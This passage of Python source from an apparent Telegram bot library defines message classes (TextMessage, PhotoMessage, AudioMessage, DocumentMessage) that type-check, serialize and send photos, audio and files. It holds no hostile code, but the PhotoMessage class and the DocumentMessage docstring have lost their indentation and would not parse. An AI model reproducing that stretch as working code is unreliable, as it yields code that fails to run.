            data['reply_markup'] = None
        elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
            data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
            data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
            data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ForceReply):
            data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
        # end if
        return data
    # end def validate_array

    @staticmethod
    def from_array(array):
        """
        Deserialize a new TextMessage from a given dictionary.

        :return: new TextMessage instance, or None if `array` is falsy.
        :rtype: TextMessage
        """
        if not array:  # None or {}
            return None
        # end if
        data = TextMessage.validate_array(array)
        return TextMessage(**data)
    # end def from_array

    def __str__(self):
        """
        Implements `str(textmessage_instance)`
        """
        return "TextMessage(text={self.text!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, parse_mode={self.parse_mode!r}, entities={self.entities!r}, disable_web_page_preview={self.disable_web_page_preview!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __str__

    def __repr__(self):
        """
        Implements `repr(textmessage_instance)`
        """
        return "TextMessage(text={self.text!r}, receiver={self.receiver!r}, reply_id={self.reply_id!r}, parse_mode={self.parse_mode!r}, entities={self.entities!r}, disable_web_page_preview={self.disable_web_page_preview!r}, disable_notification={self.disable_notification!r}, allow_sending_without_reply={self.allow_sending_without_reply!r}, reply_markup={self.reply_markup!r})".format(self=self)
    # end def __repr__

    def __contains__(self, key):
        """
        Implements `"key" in textmessage_instance`

        True only for known field names that are set to a truthy value.
        """
        return (
            key in ["text", "receiver", "reply_id", "parse_mode", "entities", "disable_web_page_preview", "disable_notification", "allow_sending_without_reply", "reply_markup"]
            and hasattr(self, key)
            and bool(getattr(self, key, None))
        )
    # end def __contains__
# end class TextMessage
class PhotoMessage(ReturnableMessageBase):
"""
Use this method to send photos. On success, the sent Message is returned.
https://core.telegram.org/bots/api#sendphoto
Parameters:
:param photo: Photo to send. Pass a file_id as String to send a photo that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a photo from the Internet, or upload a new photo using multipart/form-data. The photo must be at most 10 MB in size. The photo's width and height must not exceed 10000 in total. Width and height ratio must be at most 20. More info on Sending Files »
:type photo: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
:param caption: Photo caption (may also be used when resending photos by file_id), 0-1024 characters after entities parsing
:type caption: str|unicode
:param parse_mode: Mode for parsing entities in the photo caption. See formatting options for more details.
:type parse_mode: str|unicode
:param caption_entities: A JSON-serialized list of special entities that appear in the caption, which can be specified instead of parse_mode
:type caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity
:param disable_notification: Sends the message silently. Users will receive a notification with no sound.
:type disable_notification: bool
:param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found
:type allow_sending_without_reply: bool
:param reply_markup: Additional interface options. A JSON-serialized object for an inline keyboard, custom reply keyboard, instructions to remove reply keyboard or to force a reply from the user.
:type reply_markup: pytgbot.api_types.sendable.reply_markup.InlineKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardMarkup | pytgbot.api_types.sendable.reply_markup.ReplyKeyboardRemove | pytgbot.api_types.sendable.reply_markup.ForceReply
"""
def __init__(self, photo, receiver=None, reply_id=DEFAULT_MESSAGE_ID, caption=None, parse_mode=None, caption_entities=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
    """
    Use this method to send photos. On success, the sent Message is returned.

    https://core.telegram.org/bots/api#sendphoto

    Parameters:

    :param photo: Photo to send. Pass a file_id as String to send a photo that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a photo from the Internet, or upload a new photo using multipart/form-data. The photo must be at most 10 MB in size. The photo's width and height must not exceed 10000 in total. Width and height ratio must be at most 20.
    :type  photo: pytgbot.api_types.sendable.files.InputFile | str|unicode

    Optional keyword parameters:

    :param receiver: Overwrites the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type  receiver: str|unicode | int | None

    :param reply_id: Overwrites the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type  reply_id: DEFAULT_MESSAGE_ID | int | None

    :param caption: Photo caption (may also be used when resending photos by file_id), 0-1024 characters after entities parsing.
    :type  caption: str|unicode | None

    :param parse_mode: Mode for parsing entities in the photo caption.
    :type  parse_mode: str|unicode | None

    :param caption_entities: List of special entities that appear in the caption, can be specified instead of parse_mode.
    :type  caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity | None

    :param disable_notification: Sends the message silently (notification with no sound).
    :type  disable_notification: bool | None

    :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found.
    :type  allow_sending_without_reply: bool | None

    :param reply_markup: Additional interface options: inline keyboard, custom reply keyboard, remove-keyboard instruction or force-reply.
    :type  reply_markup: InlineKeyboardMarkup | ReplyKeyboardMarkup | ReplyKeyboardRemove | ForceReply | None

    :raises TypeError: if any parameter has a type not listed above.
    """
    super(PhotoMessage, self).__init__()
    # local imports keep module load free of import cycles
    # (the unused MessageEntity import of the generated original was dropped)
    from pytgbot.api_types.sendable.files import InputFile
    from pytgbot.api_types.sendable.reply_markup import ForceReply, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove

    # validate each argument before storing it, so a bad value fails fast
    assert_type_or_raise(photo, InputFile, unicode_type, parameter_name="photo")
    self.photo = photo
    assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
    self.receiver = receiver
    assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
    self.reply_id = reply_id
    assert_type_or_raise(caption, None, unicode_type, parameter_name="caption")
    self.caption = caption
    assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
    self.parse_mode = parse_mode
    # NOTE(review): only the list itself is type-checked here, not its
    # elements — presumably element validation happens downstream; confirm.
    assert_type_or_raise(caption_entities, None, list, parameter_name="caption_entities")
    self.caption_entities = caption_entities
    assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
    self.disable_notification = disable_notification
    assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
    self.allow_sending_without_reply = allow_sending_without_reply
    assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
    self.reply_markup = reply_markup
    # custom variable for message chaining
    self._next_msg = None
# end def __init__
def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
    """
    Send the message via pytgbot.

    :param sender: The bot instance to send with.
    :type  sender: pytgbot.bot.Bot

    :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
    :type  ignore_reply: bool

    :return: the sent Message as reported by the Telegram API.
    :rtype: PytgbotApiMessage
    """
    return sender.send_photo(
        photo=self.photo,
        chat_id=self.receiver,
        # fix: `ignore_reply` used to be accepted but never honored, so a
        # resend after a failed reply target would fail again; drop the id.
        reply_to_message_id=None if ignore_reply else self.reply_id,
        caption=self.caption,
        parse_mode=self.parse_mode,
        caption_entities=self.caption_entities,
        disable_notification=self.disable_notification,
        allow_sending_without_reply=self.allow_sending_without_reply,
        reply_markup=self.reply_markup,
    )
# end def actual_send
def to_array(self):
    """
    Serializes this PhotoMessage to a dictionary.

    Optional fields that are None are omitted from the result instead of
    raising; the previous version crashed (TypeError) when e.g. `receiver`
    or `reply_markup` were left unset, even though `__init__` allows None.

    :return: dictionary representation of this object.
    :rtype: dict
    """
    from pytgbot.api_types.sendable.files import InputFile
    from pytgbot.api_types.sendable.reply_markup import ForceReply, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove
    array = super(PhotoMessage, self).to_array()

    # photo is required and must be one of the two accepted types
    if isinstance(self.photo, InputFile):
        array['photo'] = self.photo.to_array()  # type InputFile
    elif isinstance(self.photo, str):
        array['photo'] = u(self.photo)  # py2: type unicode, py3: type str
    else:
        raise TypeError('Unknown type, must be one of InputFile, str.')
    # end if

    # every remaining field is optional: skip it when unset (None)
    if self.receiver is not None:
        if isinstance(self.receiver, str):
            array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
        elif isinstance(self.receiver, int):
            array['chat_id'] = int(self.receiver)  # type int
        else:
            raise TypeError('Unknown type, must be one of str, int.')
        # end if
    # end if
    if self.reply_id is not None:
        if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
            array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
        elif isinstance(self.reply_id, int):
            array['reply_to_message_id'] = int(self.reply_id)  # type int
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
        # end if
    # end if
    if self.caption is not None:
        array['caption'] = u(self.caption)  # py2: type unicode, py3: type str
    # end if
    if self.parse_mode is not None:
        array['parse_mode'] = u(self.parse_mode)  # py2: type unicode, py3: type str
    # end if
    if self.caption_entities is not None:
        array['caption_entities'] = PytgbotApiBot._as_array(self.caption_entities)  # type list of MessageEntity
    # end if
    if self.disable_notification is not None:
        array['disable_notification'] = bool(self.disable_notification)  # type bool
    # end if
    if self.allow_sending_without_reply is not None:
        array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
    # end if
    if self.reply_markup is not None:
        if isinstance(self.reply_markup, (InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply)):
            # all four markup types share the same to_array() serialization hook
            array['reply_markup'] = self.reply_markup.to_array()
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
        # end if
    # end if
    return array
# end def to_array
@staticmethod
def validate_array(array):
    """
    Builds a new array with valid values for the PhotoMessage constructor.

    Maps the Telegram API field names (``chat_id``, ``reply_to_message_id``)
    back onto the constructor parameter names (``receiver``, ``reply_id``),
    converting each value to the type the constructor expects.

    :param array: serialized representation of a PhotoMessage.
    :type  array: dict

    :return: new array with valid values
    :rtype: dict

    :raises TypeError: if a field has a value of an unexpected type.
    """
    assert_type_or_raise(array, dict, parameter_name="array")
    # local imports to avoid import cycles at module load time
    from pytgbot.api_types.receivable.media import MessageEntity
    from pytgbot.api_types.sendable.files import InputFile
    from pytgbot.api_types.sendable.reply_markup import ForceReply
    from pytgbot.api_types.sendable.reply_markup import InlineKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardMarkup
    from pytgbot.api_types.sendable.reply_markup import ReplyKeyboardRemove
    # let the base class validate the fields it owns first
    data = super(PhotoMessage, PhotoMessage).validate_array(array)
    # required field: photo
    # NOTE(review): a photo serialized by to_array() comes back as a dict,
    # which matches neither branch below — presumably callers pass InputFile
    # instances or file_id strings directly; confirm against callers.
    if isinstance(array.get('photo'), InputFile):
        data['photo'] = InputFile.from_array(array.get('photo'))
    elif isinstance(array.get('photo'), str):
        data['photo'] = u(array.get('photo'))
    else:
        raise TypeError('Unknown type, must be one of InputFile, str.')
    # end if
    # optional: chat_id -> receiver
    if array.get('chat_id') is None:
        data['receiver'] = None
    elif isinstance(array.get('chat_id'), str):
        data['receiver'] = u(array.get('chat_id'))
    elif isinstance(array.get('chat_id'), int):
        data['receiver'] = int(array.get('chat_id'))
    else:
        raise TypeError('Unknown type, must be one of str, int or None.')
    # end if
    # optional: reply_to_message_id -> reply_id
    if array.get('reply_to_message_id') is None:
        data['reply_id'] = None
    elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
        # NOTE(review): this stores the DEFAULT_MESSAGE_ID sentinel itself
        # (not the wrapped value, unlike to_array which calls
        # DEFAULT_MESSAGE_ID(...)) — TODO confirm this is intended.
        data['reply_id'] = DEFAULT_MESSAGE_ID
    elif isinstance(array.get('reply_to_message_id'), int):
        data['reply_id'] = int(array.get('reply_to_message_id'))
    else:
        raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
    # end if
    # optional scalar fields: convert when present, None stays None
    data['caption'] = u(array.get('caption')) if array.get('caption') is not None else None
    data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
    data['caption_entities'] = MessageEntity.from_array_list(array.get('caption_entities'), list_level=1) if array.get('caption_entities') is not None else None
    data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
    data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
    # optional: reply_markup, dispatched on the concrete markup type
    if array.get('reply_markup') is None:
        data['reply_markup'] = None
    elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
        data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
    elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
        data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
    elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
        data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
    elif isinstance(array.get('reply_markup'), ForceReply):
        data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
    else:
        raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
    # end if
    return data
# end def validate_array
@staticmethod
def from_array(array):
    """
    Deserialize a new PhotoMessage from a given dictionary.

    :param array: serialized message data, or an empty value.
    :type  array: dict | None

    :return: new PhotoMessage instance, or None for empty input.
    :rtype: PhotoMessage | None
    """
    if not array:
        # nothing to build from (None or {})
        return None
    # end if
    return PhotoMessage(**PhotoMessage.validate_array(array))
# end def from_array
def __str__(self):
    """
    Implements `str(photomessage_instance)`.

    Delegates to `__repr__`: both methods produced the same byte-identical
    format string before, so keeping a single copy avoids them drifting apart.
    """
    return self.__repr__()
# end def __str__
def __repr__(self):
    """
    Implements `repr(photomessage_instance)`.

    Produces `PhotoMessage(photo=..., receiver=..., ...)` with every field
    rendered via `repr()`.
    """
    rendered_fields = ", ".join(
        "{key}={value!r}".format(key=key, value=getattr(self, key))
        for key in (
            "photo", "receiver", "reply_id", "caption", "parse_mode",
            "caption_entities", "disable_notification",
            "allow_sending_without_reply", "reply_markup",
        )
    )
    return "PhotoMessage({fields})".format(fields=rendered_fields)
# end def __repr__
def __contains__(self, key):
    """
    Implements `"key" in photomessage_instance`.

    True only for known field names whose attribute is set and truthy.
    """
    known_keys = (
        "photo", "receiver", "reply_id", "caption", "parse_mode",
        "caption_entities", "disable_notification",
        "allow_sending_without_reply", "reply_markup",
    )
    if key not in known_keys:
        return False
    # end if
    return hasattr(self, key) and bool(getattr(self, key, None))
# end def __contains__
# end class PhotoMessage
class AudioMessage(ReturnableMessageBase):
    """
    Use this method to send audio files, if you want Telegram clients to display them in the music player. Your audio must be in the .MP3 or .M4A format. On success, the sent Message is returned. Bots can currently send audio files of up to 50 MB in size, this limit may be changed in the future.
    For sending voice messages, use the sendVoice method instead.

    https://core.telegram.org/bots/api#sendaudio

    Parameters:

    :param audio: Audio file to send. Pass a file_id as String to send an audio file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get an audio file from the Internet, or upload a new one using multipart/form-data.
    :type  audio: pytgbot.api_types.sendable.files.InputFile | str|unicode

    Optional keyword parameters:

    :param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
    :type  receiver: str|unicode | int | None

    :param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
    :type  reply_id: DEFAULT_MESSAGE_ID | int | None

    :param caption: Audio caption, 0-1024 characters after entities parsing.
    :type  caption: str|unicode | None

    :param parse_mode: Mode for parsing entities in the audio caption.
    :type  parse_mode: str|unicode | None

    :param caption_entities: List of special entities that appear in the caption, can be specified instead of parse_mode.
    :type  caption_entities: list of pytgbot.api_types.receivable.media.MessageEntity | None

    :param duration: Duration of the audio in seconds.
    :type  duration: int | None

    :param performer: Performer.
    :type  performer: str|unicode | None

    :param title: Track name.
    :type  title: str|unicode | None

    :param thumb: Thumbnail of the file sent; can be ignored if thumbnail generation for the file is supported server-side. The thumbnail should be in JPEG format and less than 200 kB in size. A thumbnail's width and height should not exceed 320. Ignored if the file is not uploaded using multipart/form-data. Thumbnails can't be reused and can be only uploaded as a new file, so you can pass "attach://<file_attach_name>" if the thumbnail was uploaded using multipart/form-data under <file_attach_name>.
    :type  thumb: pytgbot.api_types.sendable.files.InputFile | str|unicode | None

    :param disable_notification: Sends the message silently (notification with no sound).
    :type  disable_notification: bool | None

    :param allow_sending_without_reply: Pass True, if the message should be sent even if the specified replied-to message is not found.
    :type  allow_sending_without_reply: bool | None

    :param reply_markup: Additional interface options: inline keyboard, custom reply keyboard, remove-keyboard instruction or force-reply.
    :type  reply_markup: InlineKeyboardMarkup | ReplyKeyboardMarkup | ReplyKeyboardRemove | ForceReply | None
    """

    def __init__(self, audio, receiver=None, reply_id=DEFAULT_MESSAGE_ID, caption=None, parse_mode=None, caption_entities=None, duration=None, performer=None, title=None, thumb=None, disable_notification=None, allow_sending_without_reply=None, reply_markup=None):
        """
        Create a new sendAudio message.

        See the class docstring for the documentation of all parameters.

        :raises TypeError: if any parameter has an unexpected type.
        """
        super(AudioMessage, self).__init__()
        # local imports keep module load free of import cycles
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove

        # validate every argument before storing it, so bad values fail fast
        assert_type_or_raise(audio, InputFile, unicode_type, parameter_name="audio")
        self.audio = audio
        assert_type_or_raise(receiver, None, unicode_type, int, parameter_name="receiver")
        self.receiver = receiver
        assert_type_or_raise(reply_id, None, DEFAULT_MESSAGE_ID, int, parameter_name="reply_id")
        self.reply_id = reply_id
        assert_type_or_raise(caption, None, unicode_type, parameter_name="caption")
        self.caption = caption
        assert_type_or_raise(parse_mode, None, unicode_type, parameter_name="parse_mode")
        self.parse_mode = parse_mode
        # NOTE(review): only the list itself is type-checked, not its elements
        assert_type_or_raise(caption_entities, None, list, parameter_name="caption_entities")
        self.caption_entities = caption_entities
        assert_type_or_raise(duration, None, int, parameter_name="duration")
        self.duration = duration
        assert_type_or_raise(performer, None, unicode_type, parameter_name="performer")
        self.performer = performer
        assert_type_or_raise(title, None, unicode_type, parameter_name="title")
        self.title = title
        assert_type_or_raise(thumb, None, InputFile, unicode_type, parameter_name="thumb")
        self.thumb = thumb
        assert_type_or_raise(disable_notification, None, bool, parameter_name="disable_notification")
        self.disable_notification = disable_notification
        assert_type_or_raise(allow_sending_without_reply, None, bool, parameter_name="allow_sending_without_reply")
        self.allow_sending_without_reply = allow_sending_without_reply
        assert_type_or_raise(reply_markup, None, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply, parameter_name="reply_markup")
        self.reply_markup = reply_markup
        # custom variable for message chaining
        self._next_msg = None
    # end def __init__

    def actual_send(self, sender: PytgbotApiBot, *, ignore_reply: bool = False) -> PytgbotApiMessage:
        """
        Send the message via pytgbot.

        :param sender: The bot instance to send with.
        :type  sender: pytgbot.bot.Bot

        :param ignore_reply: If we should not include the `reply_to` parameter, because that already failed.
        :type  ignore_reply: bool

        :return: the sent Message as reported by the Telegram API.
        :rtype: PytgbotApiMessage
        """
        return sender.send_audio(
            audio=self.audio,
            chat_id=self.receiver,
            # fix: `ignore_reply` used to be accepted but never honored, so a
            # resend after a failed reply target would fail again; drop the id.
            reply_to_message_id=None if ignore_reply else self.reply_id,
            caption=self.caption,
            parse_mode=self.parse_mode,
            caption_entities=self.caption_entities,
            duration=self.duration,
            performer=self.performer,
            title=self.title,
            thumb=self.thumb,
            disable_notification=self.disable_notification,
            allow_sending_without_reply=self.allow_sending_without_reply,
            reply_markup=self.reply_markup,
        )
    # end def actual_send

    def to_array(self):
        """
        Serializes this AudioMessage to a dictionary.

        Optional fields that are None are omitted from the result instead of
        raising; the previous version crashed (TypeError) when e.g. `receiver`
        or `thumb` were left unset, even though `__init__` allows None.

        :return: dictionary representation of this object.
        :rtype: dict
        """
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove
        array = super(AudioMessage, self).to_array()

        # audio is required and must be one of the two accepted types
        if isinstance(self.audio, InputFile):
            array['audio'] = self.audio.to_array()  # type InputFile
        elif isinstance(self.audio, str):
            array['audio'] = u(self.audio)  # py2: type unicode, py3: type str
        else:
            raise TypeError('Unknown type, must be one of InputFile, str.')
        # end if

        # every remaining field is optional: skip it when unset (None)
        if self.receiver is not None:
            if isinstance(self.receiver, str):
                array['chat_id'] = u(self.receiver)  # py2: type unicode, py3: type str
            elif isinstance(self.receiver, int):
                array['chat_id'] = int(self.receiver)  # type int
            else:
                raise TypeError('Unknown type, must be one of str, int.')
            # end if
        # end if
        if self.reply_id is not None:
            if isinstance(self.reply_id, DEFAULT_MESSAGE_ID):
                array['reply_to_message_id'] = DEFAULT_MESSAGE_ID(self.reply_id)  # type DEFAULT_MESSAGE_ID
            elif isinstance(self.reply_id, int):
                array['reply_to_message_id'] = int(self.reply_id)  # type int
            else:
                raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int.')
            # end if
        # end if
        if self.caption is not None:
            array['caption'] = u(self.caption)  # py2: type unicode, py3: type str
        # end if
        if self.parse_mode is not None:
            array['parse_mode'] = u(self.parse_mode)  # py2: type unicode, py3: type str
        # end if
        if self.caption_entities is not None:
            array['caption_entities'] = PytgbotApiBot._as_array(self.caption_entities)  # type list of MessageEntity
        # end if
        if self.duration is not None:
            array['duration'] = int(self.duration)  # type int
        # end if
        if self.performer is not None:
            array['performer'] = u(self.performer)  # py2: type unicode, py3: type str
        # end if
        if self.title is not None:
            array['title'] = u(self.title)  # py2: type unicode, py3: type str
        # end if
        if self.thumb is not None:
            if isinstance(self.thumb, InputFile):
                array['thumb'] = self.thumb.to_array()  # type InputFile
            elif isinstance(self.thumb, str):
                array['thumb'] = u(self.thumb)  # py2: type unicode, py3: type str
            else:
                raise TypeError('Unknown type, must be one of InputFile, str.')
            # end if
        # end if
        if self.disable_notification is not None:
            array['disable_notification'] = bool(self.disable_notification)  # type bool
        # end if
        if self.allow_sending_without_reply is not None:
            array['allow_sending_without_reply'] = bool(self.allow_sending_without_reply)  # type bool
        # end if
        if self.reply_markup is not None:
            if isinstance(self.reply_markup, (InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply)):
                # all four markup types share the same to_array() serialization hook
                array['reply_markup'] = self.reply_markup.to_array()
            else:
                raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply.')
            # end if
        # end if
        return array
    # end def to_array

    @staticmethod
    def validate_array(array):
        """
        Builds a new array with valid values for the AudioMessage constructor.

        Maps the Telegram API field names (``chat_id``, ``reply_to_message_id``)
        back onto the constructor parameter names (``receiver``, ``reply_id``).

        :return: new array with valid values
        :rtype: dict

        :raises TypeError: if a field has a value of an unexpected type.
        """
        assert_type_or_raise(array, dict, parameter_name="array")
        from pytgbot.api_types.receivable.media import MessageEntity
        from pytgbot.api_types.sendable.files import InputFile
        from pytgbot.api_types.sendable.reply_markup import ForceReply, InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove
        # let the base class validate the fields it owns first
        data = super(AudioMessage, AudioMessage).validate_array(array)
        # required field: audio
        if isinstance(array.get('audio'), InputFile):
            data['audio'] = InputFile.from_array(array.get('audio'))
        elif isinstance(array.get('audio'), str):
            data['audio'] = u(array.get('audio'))
        else:
            raise TypeError('Unknown type, must be one of InputFile, str.')
        # end if
        # optional: chat_id -> receiver
        if array.get('chat_id') is None:
            data['receiver'] = None
        elif isinstance(array.get('chat_id'), str):
            data['receiver'] = u(array.get('chat_id'))
        elif isinstance(array.get('chat_id'), int):
            data['receiver'] = int(array.get('chat_id'))
        else:
            raise TypeError('Unknown type, must be one of str, int or None.')
        # end if
        # optional: reply_to_message_id -> reply_id
        if array.get('reply_to_message_id') is None:
            data['reply_id'] = None
        elif isinstance(array.get('reply_to_message_id'), DEFAULT_MESSAGE_ID):
            # NOTE(review): stores the DEFAULT_MESSAGE_ID sentinel itself,
            # discarding the wrapped value — TODO confirm this is intended.
            data['reply_id'] = DEFAULT_MESSAGE_ID
        elif isinstance(array.get('reply_to_message_id'), int):
            data['reply_id'] = int(array.get('reply_to_message_id'))
        else:
            raise TypeError('Unknown type, must be one of DEFAULT_MESSAGE_ID, int or None.')
        # end if
        # optional scalar fields: convert when present, None stays None
        data['caption'] = u(array.get('caption')) if array.get('caption') is not None else None
        data['parse_mode'] = u(array.get('parse_mode')) if array.get('parse_mode') is not None else None
        data['caption_entities'] = MessageEntity.from_array_list(array.get('caption_entities'), list_level=1) if array.get('caption_entities') is not None else None
        data['duration'] = int(array.get('duration')) if array.get('duration') is not None else None
        data['performer'] = u(array.get('performer')) if array.get('performer') is not None else None
        data['title'] = u(array.get('title')) if array.get('title') is not None else None
        # optional: thumb (InputFile or file_id/url string)
        if array.get('thumb') is None:
            data['thumb'] = None
        elif isinstance(array.get('thumb'), InputFile):
            data['thumb'] = InputFile.from_array(array.get('thumb'))
        elif isinstance(array.get('thumb'), str):
            data['thumb'] = u(array.get('thumb'))
        else:
            raise TypeError('Unknown type, must be one of InputFile, str or None.')
        # end if
        data['disable_notification'] = bool(array.get('disable_notification')) if array.get('disable_notification') is not None else None
        data['allow_sending_without_reply'] = bool(array.get('allow_sending_without_reply')) if array.get('allow_sending_without_reply') is not None else None
        # optional: reply_markup, dispatched on the concrete markup type
        if array.get('reply_markup') is None:
            data['reply_markup'] = None
        elif isinstance(array.get('reply_markup'), InlineKeyboardMarkup):
            data['reply_markup'] = InlineKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardMarkup):
            data['reply_markup'] = ReplyKeyboardMarkup.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ReplyKeyboardRemove):
            data['reply_markup'] = ReplyKeyboardRemove.from_array(array.get('reply_markup'))
        elif isinstance(array.get('reply_markup'), ForceReply):
            data['reply_markup'] = ForceReply.from_array(array.get('reply_markup'))
        else:
            raise TypeError('Unknown type, must be one of InlineKeyboardMarkup, ReplyKeyboardMarkup, ReplyKeyboardRemove, ForceReply or None.')
        # end if
        return data
    # end def validate_array

    @staticmethod
    def from_array(array):
        """
        Deserialize a new AudioMessage from a given dictionary.

        :param array: serialized message data, or an empty value.
        :type  array: dict | None

        :return: new AudioMessage instance, or None for empty input.
        :rtype: AudioMessage | None
        """
        if not array:
            # nothing to build from (None or {})
            return None
        # end if
        return AudioMessage(**AudioMessage.validate_array(array))
    # end def from_array

    def __str__(self):
        """
        Implements `str(audiomessage_instance)`.

        Delegates to `__repr__`: both methods produced the same byte-identical
        format string before; one copy avoids them drifting apart.
        """
        return self.__repr__()
    # end def __str__

    def __repr__(self):
        """
        Implements `repr(audiomessage_instance)`.

        Produces `AudioMessage(audio=..., receiver=..., ...)` with every field
        rendered via `repr()`.
        """
        rendered_fields = ", ".join(
            "{key}={value!r}".format(key=key, value=getattr(self, key))
            for key in (
                "audio", "receiver", "reply_id", "caption", "parse_mode",
                "caption_entities", "duration", "performer", "title", "thumb",
                "disable_notification", "allow_sending_without_reply", "reply_markup",
            )
        )
        return "AudioMessage({fields})".format(fields=rendered_fields)
    # end def __repr__

    def __contains__(self, key):
        """
        Implements `"key" in audiomessage_instance`.

        True only for known field names whose attribute is set and truthy.
        """
        known_keys = (
            "audio", "receiver", "reply_id", "caption", "parse_mode",
            "caption_entities", "duration", "performer", "title", "thumb",
            "disable_notification", "allow_sending_without_reply", "reply_markup",
        )
        if key not in known_keys:
            return False
        # end if
        return hasattr(self, key) and bool(getattr(self, key, None))
    # end def __contains__
# end class AudioMessage
class DocumentMessage(ReturnableMessageBase):
"""
Use this method to send general files. On success, the sent Message is returned. Bots can currently send files of any type of up to 50 MB in size, this limit may be changed in the future.
https://core.telegram.org/bots/api#senddocument
Parameters:
:param document: File to send. Pass a file_id as String to send a file that exists on the Telegram servers (recommended), pass an HTTP URL as a String for Telegram to get a file from the Internet, or upload a new one using multipart/form-data. More info on Sending Files »
:type document: pytgbot.api_types.sendable.files.InputFile | str|unicode
Optional keyword parameters:
:param receiver: Set if you want to overwrite the receiver, which automatically is the chat_id in group chats, and the from_peer id in private conversations.
:type receiver: str|unicode | int
:param reply_id: Set if you want to overwrite the `reply_to_message_id`, which automatically is the message triggering the bot.
:type reply_id: DEFAULT_MESSAGE_ID | int
